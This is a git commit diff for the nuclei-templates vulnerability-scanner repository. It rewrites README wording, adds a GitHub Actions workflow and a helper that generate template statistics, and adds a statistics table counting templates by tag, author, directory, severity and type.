commit
f1900edf14
|
@ -3,7 +3,7 @@ f"""
|
|||
<h1 align="center">
|
||||
Nuclei Templates
|
||||
</h1>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
|
@ -24,25 +24,21 @@ Nuclei Templates
|
|||
|
||||
----
|
||||
|
||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
|
||||
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
|
||||
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
|
||||
|
||||
|
||||
## Nuclei Templates overview
|
||||
|
||||
|
||||
An overview of the nuclei template directory including number of templates associated with each directory.
|
||||
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
|
||||
| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
|
||||
| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
|
||||
| default-logins | {countTpl("default-logins/*")} | file | {countTpl("file/*")} | dns | {countTpl("dns")} |
|
||||
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
|
||||
{get_top10()}
|
||||
|
||||
**{command("tree", -2, None)}**.
|
||||
|
||||
|
@ -50,34 +46,34 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
📖 Documentation
|
||||
-----
|
||||
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
|
||||
We have also added a set of templates to help you understand how things work.
|
||||
|
||||
💪 Contributions
|
||||
-----
|
||||
|
||||
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
Have questions / doubts / ideas to discuss?
|
||||
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
|
||||
👨💻 Community
|
||||
-----
|
||||
|
||||
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
|
||||
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
|
||||
💡 Notes
|
||||
-----
|
||||
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
|
||||
|
||||
|
||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||
"""
|
|
@ -8,6 +8,11 @@ def countTpl(path):
|
|||
def command(args, start=None, end=None):
|
||||
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
|
||||
|
||||
def get_top10():
|
||||
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
|
||||
TOP10 = command(["cat", "TOP-10.md"])
|
||||
return HEADER + TOP10 if len(TOP10) > 0 else ""
|
||||
|
||||
if __name__ == "__main__":
|
||||
version = command(["git", "describe", "--tags", "--abbrev=0"])
|
||||
template = eval(open(".github/scripts/README.tmpl", "r").read())
|
||||
|
|
|
@ -0,0 +1,70 @@
|
|||
name: 🗒 Templates Stats
|
||||
|
||||
on:
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout Repo
|
||||
uses: actions/checkout@master
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Setup golang
|
||||
uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.14
|
||||
|
||||
- name: Cache Go
|
||||
id: cache-go
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: /home/runner/go
|
||||
key: ${{ runner.os }}-go
|
||||
|
||||
- name: Installing Template Stats
|
||||
if: steps.cache-go.outputs.cache-hit != 'true'
|
||||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go get -v github.com/projectdiscovery/templates-stats
|
||||
shell: bash
|
||||
|
||||
- name: Markdown Stats
|
||||
run: |
|
||||
templates-stats -output TEMPLATES-STATS.md -path {{ github.workspace }}
|
||||
shell: bash
|
||||
|
||||
- name: JSON Stats
|
||||
run: |
|
||||
templates-stats -output TEMPLATES-STATS.json -json -path {{ github.workspace }}
|
||||
shell: bash
|
||||
|
||||
- name: Top 10 Stats
|
||||
run: |
|
||||
templates-stats -output TOP-10.md -top 10 -path {{ github.workspace }}
|
||||
shell: bash
|
||||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
git add TOP-10.md
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
@ -1,12 +1,10 @@
|
|||
name: 📝 Readme Update
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
|
|
|
@ -8,10 +8,9 @@
|
|||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
- "fuzz"
|
||||
- "revision"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
49
README.md
49
README.md
|
@ -3,7 +3,7 @@
|
|||
<h1 align="center">
|
||||
Nuclei Templates
|
||||
</h1>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
|
||||
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
|
@ -24,59 +24,68 @@ Nuclei Templates
|
|||
|
||||
----
|
||||
|
||||
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
|
||||
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
|
||||
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
|
||||
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
|
||||
|
||||
|
||||
## Nuclei Templates overview
|
||||
|
||||
|
||||
An overview of the nuclei template directory including number of templates associated with each directory.
|
||||
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 |
|
||||
| takeovers | 70 | exposures | 116 | technologies | 125 |
|
||||
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
|
||||
| default-logins | 44 | file | 42 | dns | 10 |
|
||||
| fuzzing | 10 | helpers | 9 | iot | 18 |
|
||||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
**134 directories, 1596 files**.
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 |
|
||||
| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 |
|
||||
| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
|
||||
| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 |
|
||||
| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | |
|
||||
| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
|
||||
| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | |
|
||||
| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
|
||||
| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
|
||||
| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | |
|
||||
|
||||
**134 directories, 1612 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
📖 Documentation
|
||||
-----
|
||||
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
|
||||
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
|
||||
We have also added a set of templates to help you understand how things work.
|
||||
|
||||
💪 Contributions
|
||||
-----
|
||||
|
||||
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
Have questions / doubts / ideas to discuss?
|
||||
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
|
||||
|
||||
👨💻 Community
|
||||
-----
|
||||
|
||||
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
You are welcome to join our [Discord Community](https://discord.gg/KECAGdH).
|
||||
You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
|
||||
|
||||
💡 Notes
|
||||
-----
|
||||
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
|
||||
|
||||
|
||||
Thanks again for your contribution and keeping the community vibrant. :heart:
|
||||
Thanks again for your contribution and keeping this community vibrant. :heart:
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,601 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1408 |
|
||||
| panel | 201 | pdteam | 184 | vulnerabilities | 232 | high | 395 | file | 42 |
|
||||
| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
|
||||
| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 |
|
||||
| rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | |
|
||||
| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
|
||||
| cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | |
|
||||
| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
|
||||
| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
|
||||
| cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | |
|
||||
| config | 81 | ice3man | 26 | miscellaneous | 27 | | | | |
|
||||
| tech | 72 | pussycat0x | 25 | network | 25 | | | | |
|
||||
| takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | |
|
||||
| cve2021 | 71 | organiccrap | 19 | dns | 10 | | | | |
|
||||
| token | 63 | sheikhrishad | 15 | fuzzing | 10 | | | | |
|
||||
| cve2018 | 62 | milo2012 | 13 | cnvd | 9 | | | | |
|
||||
| apache | 60 | techbrunchfr | 13 | headless | 5 | | | | |
|
||||
| default-login | 45 | suman_kar | 12 | .pre-commit-config.yaml | 1 | | | | |
|
||||
| cve2017 | 43 | pr3r00t | 12 | | | | | | |
|
||||
| file | 42 | cyllective | 11 | | | | | | |
|
||||
| unauth | 39 | random_robbie | 10 | | | | | | |
|
||||
| iot | 33 | righettod | 9 | | | | | | |
|
||||
| network | 32 | wdahlenb | 8 | | | | | | |
|
||||
| sqli | 29 | hackergautam | 8 | | | | | | |
|
||||
| oracle | 29 | nadino | 8 | | | | | | |
|
||||
| workflow | 28 | aashiq | 8 | | | | | | |
|
||||
| misc | 27 | iamthefrogy | 8 | | | | | | |
|
||||
| atlassian | 26 | harshbothra_ | 7 | | | | | | |
|
||||
| ssrf | 25 | randomstr1ng | 7 | | | | | | |
|
||||
| jira | 25 | techryptic (@tech) | 7 | | | | | | |
|
||||
| disclosure | 24 | oppsec | 7 | | | | | | |
|
||||
| oob | 24 | r3dg33k | 7 | | | | | | |
|
||||
| logs | 24 | emadshanab | 7 | | | | | | |
|
||||
| redirect | 20 | 0x240x23elu | 7 | | | | | | |
|
||||
| aem | 18 | dr_set | 7 | | | | | | |
|
||||
| listing | 15 | that_juan_ | 7 | | | | | | |
|
||||
| cisco | 15 | melbadry9 | 7 | | | | | | |
|
||||
| sap | 14 | philippedelteil | 6 | | | | | | |
|
||||
| cve2016 | 14 | __fazal | 6 | | | | | | |
|
||||
| debug | 13 | yanyun | 5 | | | | | | |
|
||||
| struts | 13 | panch0r3d | 5 | | | | | | |
|
||||
| misconfig | 13 | puzzlepeaches | 5 | | | | | | |
|
||||
| cve2015 | 13 | caspergn | 5 | | | | | | |
|
||||
| fuzz | 13 | pentest_swissky | 5 | | | | | | |
|
||||
| weblogic | 12 | ganofins | 5 | | | | | | |
|
||||
| android | 12 | iamnoooob | 4 | | | | | | |
|
||||
| dns | 11 | xelkomy | 4 | | | | | | |
|
||||
| auth-bypass | 11 | e_schultze_ | 4 | | | | | | |
|
||||
| zoho | 11 | rootxharsh | 4 | | | | | | |
|
||||
| springboot | 11 | meme-lord | 4 | | | | | | |
|
||||
| devops | 10 | nodauf | 4 | | | | | | |
|
||||
| cve2011 | 10 | github.com/its0x08 | 4 | | | | | | |
|
||||
| jenkins | 9 | shine | 3 | | | | | | |
|
||||
| cve2012 | 9 | thomas_from_offensity | 3 | | | | | | |
|
||||
| magento | 9 | tess | 3 | | | | | | |
|
||||
| dlink | 9 | 0w4ys | 3 | | | | | | |
|
||||
| aws | 8 | impramodsargar | 3 | | | | | | |
|
||||
| php | 8 | yash anand @yashanand155 | 3 | | | | | | |
|
||||
| gitlab | 8 | z3bd | 3 | | | | | | |
|
||||
| cve2013 | 8 | f1tz | 3 | | | | | | |
|
||||
| cnvd | 8 | fyoorer | 3 | | | | | | |
|
||||
| airflow | 8 | binaryfigments | 3 | | | | | | |
|
||||
| adobe | 8 | kophjager007 | 3 | | | | | | |
|
||||
| ftp | 8 | joanbono | 3 | | | | | | |
|
||||
| scada | 7 | 0xprial | 2 | | | | | | |
|
||||
| joomla | 7 | vavkamil | 2 | | | | | | |
|
||||
| cve2014 | 7 | swissky | 2 | | | | | | |
|
||||
| vmware | 7 | joeldeleep | 2 | | | | | | |
|
||||
| citrix | 6 | elsfa7110 | 2 | | | | | | |
|
||||
| nginx | 6 | randomrobbie | 2 | | | | | | |
|
||||
| cms | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | |
|
||||
| rails | 6 | afaq | 2 | | | | | | |
|
||||
| backup | 6 | manas_harsh | 2 | | | | | | |
|
||||
| xxe | 6 | pxmme1337 | 2 | | | | | | |
|
||||
| api | 6 | shifacyclewala | 2 | | | | | | |
|
||||
| google | 6 | ehsahil | 2 | | | | | | |
|
||||
| rconfig | 6 | mavericknerd | 2 | | | | | | |
|
||||
| iis | 5 | 0xsapra | 2 | | | | | | |
|
||||
| jetty | 5 | x1m_martijn | 2 | | | | | | |
|
||||
| phpmyadmin | 5 | random-robbie | 2 | | | | | | |
|
||||
| login | 5 | bp0lr | 2 | | | | | | |
|
||||
| circarlife | 5 | moritz nentwig | 2 | | | | | | |
|
||||
| ssti | 5 | davidmckennirey | 2 | | | | | | |
|
||||
| lucee | 5 | amsda | 2 | | | | | | |
|
||||
| dell | 5 | foulenzer | 2 | | | | | | |
|
||||
| solr | 5 | ree4pwn | 2 | | | | | | |
|
||||
| laravel | 5 | kiblyn11 | 2 | | | | | | |
|
||||
| headless | 5 | hetroublemakr | 2 | | | | | | |
|
||||
| ruijie | 5 | 0xcrypto | 2 | | | | | | |
|
||||
| confluence | 5 | bsysop | 2 | | | | | | |
|
||||
| java | 5 | dheerajmadhukar | 2 | | | | | | |
|
||||
| drupal | 5 | gevakun | 2 | | | | | | |
|
||||
| router | 4 | udit_thakkur | 2 | | | | | | |
|
||||
| vpn | 4 | unstabl3 | 2 | | | | | | |
|
||||
| moodle | 4 | emenalf | 2 | | | | | | |
|
||||
| hongdian | 4 | incogbyte | 2 | | | | | | |
|
||||
| magmi | 4 | lu4nx | 2 | | | | | | |
|
||||
| netgear | 4 | zomsop82 | 2 | | | | | | |
|
||||
| samsung | 4 | lotusdll | 2 | | | | | | |
|
||||
| jolokia | 4 | 0xelkomy | 2 | | | | | | |
|
||||
| docker | 4 | jarijaas | 2 | | | | | | |
|
||||
| artifactory | 4 | 0xrudra | 2 | | | | | | |
|
||||
| ibm | 4 | manuelbua | 1 | | | | | | |
|
||||
| asp | 4 | absshax | 1 | | | | | | |
|
||||
| thinkcmf | 4 | idealphase | 1 | | | | | | |
|
||||
| cve2009 | 4 | notsoevilweasel | 1 | | | | | | |
|
||||
| tomcat | 4 | schniggie | 1 | | | | | | |
|
||||
| django | 4 | 0ut0fb4nd | 1 | | | | | | |
|
||||
| nodejs | 4 | raesene | 1 | | | | | | |
|
||||
| webserver | 4 | @dwisiswant0 | 1 | | | | | | |
|
||||
| traversal | 4 | th3.d1p4k | 1 | | | | | | |
|
||||
| solarwinds | 4 | patralos | 1 | | | | | | |
|
||||
| thinkphp | 4 | ringo | 1 | | | | | | |
|
||||
| fileupload | 4 | kba@sogeti_esec | 1 | | | | | | |
|
||||
| elastic | 4 | nytr0gen | 1 | | | | | | |
|
||||
| kubernetes | 3 | co0nan | 1 | | | | | | |
|
||||
| backups | 3 | _generic_human_ | 1 | | | | | | |
|
||||
| deserialization | 3 | aceseven (digisec360) | 1 | | | | | | |
|
||||
| windows | 3 | whynotke | 1 | | | | | | |
|
||||
| printer | 3 | rtcms | 1 | | | | | | |
|
||||
| resin | 3 | 0xrod | 1 | | | | | | |
|
||||
| crlf | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | |
|
||||
| caucho | 3 | ratnadip gajbhiye | 1 | | | | | | |
|
||||
| amazon | 3 | andirrahmani1 | 1 | | | | | | |
|
||||
| r-seenet | 3 | divya_mudgal | 1 | | | | | | |
|
||||
| fanruan | 3 | qlkwej | 1 | | | | | | |
|
||||
| ofbiz | 3 | yavolo | 1 | | | | | | |
|
||||
| springcloud | 3 | mubassirpatel | 1 | | | | | | |
|
||||
| kafka | 3 | smaranchand | 1 | | | | | | |
|
||||
| ssh | 3 | jeya seelan | 1 | | | | | | |
|
||||
| git | 3 | streetofhackerr007 | 1 | | | | | | |
|
||||
| vbulletin | 3 | sickwell | 1 | | | | | | |
|
||||
| oa | 3 | alifathi-h1 | 1 | | | | | | |
|
||||
| nacos | 3 | knassar702 | 1 | | | | | | |
|
||||
| microstrategy | 3 | yashgoti | 1 | | | | | | |
|
||||
| fpd | 3 | mah3sec_ | 1 | | | | | | |
|
||||
| nosqli | 3 | blckraven | 1 | | | | | | |
|
||||
| terramaster | 3 | c3l3si4n | 1 | | | | | | |
|
||||
| grafana | 3 | kurohost | 1 | | | | | | |
|
||||
| openssh | 3 | dawid czarnecki | 1 | | | | | | |
|
||||
| slack | 3 | shifacyclewla | 1 | | | | | | |
|
||||
| ebs | 3 | flag007 | 1 | | | | | | |
|
||||
| dedecms | 3 | sshell | 1 | | | | | | |
|
||||
| log | 3 | tim_koopmans | 1 | | | | | | |
|
||||
| bypass | 3 | akash.c | 1 | | | | | | |
|
||||
| lfr | 3 | alperenkesk | 1 | | | | | | |
|
||||
| mongodb | 3 | arcc | 1 | | | | | | |
|
||||
| sonarqube | 2 | undefl0w | 1 | | | | | | |
|
||||
| flir | 2 | dudez | 1 | | | | | | |
|
||||
| webcam | 2 | deena | 1 | | | | | | |
|
||||
| couchdb | 2 | wabafet | 1 | | | | | | |
|
||||
| microsoft | 2 | vsh00t | 1 | | | | | | |
|
||||
| injection | 2 | alex | 1 | | | | | | |
|
||||
| hjtcloud | 2 | luci | 1 | | | | | | |
|
||||
| ucmdb | 2 | rodnt | 1 | | | | | | |
|
||||
| httpd | 2 | luskabol | 1 | | | | | | |
|
||||
| rstudio | 2 | gal nagli | 1 | | | | | | |
|
||||
| zhiyuan | 2 | ldionmarcil | 1 | | | | | | |
|
||||
| odoo | 2 | j3ssie/geraldino2 | 1 | | | | | | |
|
||||
| telerik | 2 | b4uh0lz | 1 | | | | | | |
|
||||
| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | |
|
||||
| jellyfin | 2 | sy3omda | 1 | | | | | | |
|
||||
| yapi | 2 | kareemse1im | 1 | | | | | | |
|
||||
| paloalto | 2 | fmunozs | 1 | | | | | | |
|
||||
| jboss | 2 | elmahdi | 1 | | | | | | |
|
||||
| kentico | 2 | affix | 1 | | | | | | |
|
||||
| chamilo | 2 | iampritam | 1 | | | | | | |
|
||||
| sharepoint | 2 | fopina | 1 | | | | | | |
|
||||
| vrealize | 2 | remonsec | 1 | | | | | | |
|
||||
| oauth | 2 | hanlaomo | 1 | | | | | | |
|
||||
| saltstack | 2 | chron0x | 1 | | | | | | |
|
||||
| dos | 2 | johnjhacking | 1 | | | | | | |
|
||||
| hpe | 2 | vzamanillo | 1 | | | | | | |
|
||||
| cache | 2 | defr0ggy | 1 | | | | | | |
|
||||
| service | 2 | bolli95 | 1 | | | | | | |
|
||||
| glassfish | 2 | apt-mirror | 1 | | | | | | |
|
||||
| leak | 2 | abison_binoy | 1 | | | | | | |
|
||||
| mida | 2 | pdp | 1 | | | | | | |
|
||||
| smb | 2 | shreyapohekar | 1 | | | | | | |
|
||||
| hp | 2 | dogasantos | 1 | | | | | | |
|
||||
| hashicorp | 2 | _c0wb0y_ | 1 | | | | | | |
|
||||
| coldfusion | 2 | furkansenan | 1 | | | | | | |
|
||||
| pega | 2 | koti2 | 1 | | | | | | |
|
||||
| proxy | 2 | thezakman | 1 | | | | | | |
|
||||
| nagios | 2 | d0rkerdevil | 1 | | | | | | |
|
||||
| cve2008 | 2 | naglinagli | 1 | | | | | | |
|
||||
| kibana | 2 | r3naissance | 1 | | | | | | |
|
||||
| idrac | 2 | nkxxkn | 1 | | | | | | |
|
||||
| openfire | 2 | s1r1u5_ | 1 | | | | | | |
|
||||
| waf | 2 | 52971 | 1 | | | | | | |
|
||||
| showdoc | 2 | exploitation | 1 | | | | | | |
|
||||
| shellshock | 2 | akshansh | 1 | | | | | | |
|
||||
| wordfence | 2 | alph4byt3 | 1 | | | | | | |
|
||||
| sonicwall | 2 | 0h1in9e | 1 | | | | | | |
|
||||
| prometheus | 2 | mohammedsaneem | 1 | | | | | | |
|
||||
| intrusive | 2 | aaron_costello | 1 | | | | | | |
|
||||
| | | (@conspiracyproof) | | | | | | | |
|
||||
| nextjs | 2 | zandros0 | 1 | | | | | | |
|
||||
| smtp | 2 | fabaff | 1 | | | | | | |
|
||||
| bigip | 2 | _harleo | 1 | | | | | | |
|
||||
| natshell | 2 | ooooooo_q | 1 | | | | | | |
|
||||
| spark | 2 | noamrathaus | 1 | | | | | | |
|
||||
| icewarp | 2 | hakluke | 1 | | | | | | |
|
||||
| ecology | 2 | willd96 | 1 | | | | | | |
|
||||
| voipmonitor | 2 | omarkurt | 1 | | | | | | |
|
||||
| openam | 2 | kishore krishna (sillydaddy) | 1 | | | | | | |
|
||||
| fortios | 2 | ajaysenr | 1 | | | | | | |
|
||||
| maian | 2 | yashanand155 | 1 | | | | | | |
|
||||
| rockethchat | 2 | tirtha_mandal | 1 | | | | | | |
|
||||
| mail | 2 | sullo | 1 | | | | | | |
|
||||
| zabbix | 2 | micha3lb3n | 1 | | | | | | |
|
||||
| rockmongo | 2 | mhdsamx | 1 | | | | | | |
|
||||
| exposures | 2 | juicypotato1 | 1 | | | | | | |
|
||||
| plesk | 2 | thevillagehacker | 1 | | | | | | |
|
||||
| nexus | 2 | bjhulst | 1 | | | | | | |
|
||||
| keycloak | 2 | ipanda | 1 | | | | | | |
|
||||
| emerge | 2 | w4cky_ | 1 | | | | | | |
|
||||
| seeyon | 2 | kabirsuda | 1 | | | | | | |
|
||||
| activemq | 2 | toufik airane | 1 | | | | | | |
|
||||
| xxljob | 2 | ahmed sherif | 1 | | | | | | |
|
||||
| globalprotect | 2 | j33n1k4 | 1 | | | | | | |
|
||||
| huawei | 2 | gboddin | 1 | | | | | | |
|
||||
| frp | 2 | ilovebinbash | 1 | | | | | | |
|
||||
| splunk | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | |
|
||||
| trixbox | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | |
|
||||
| | | security | | | | | | | |
|
||||
| strapi | 2 | soyelmago | 1 | | | | | | |
|
||||
| azure | 1 | sushant kamble | 1 | | | | | | |
|
||||
| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | |
|
||||
| ssl | 1 | its0x08 | 1 | | | | | | |
|
||||
| xiuno | 1 | becivells | 1 | | | | | | |
|
||||
| enumeration | 1 | geraldino2 | 1 | | | | | | |
|
||||
| javamelody | 1 | pudsec | 1 | | | | | | |
|
||||
| nuuo | 1 | daviey | 1 | | | | | | |
|
||||
| hadoop | 1 | berkdusunur | 1 | | | | | | |
|
||||
| lanproxy | 1 | ohlinge | 1 | | | | | | |
|
||||
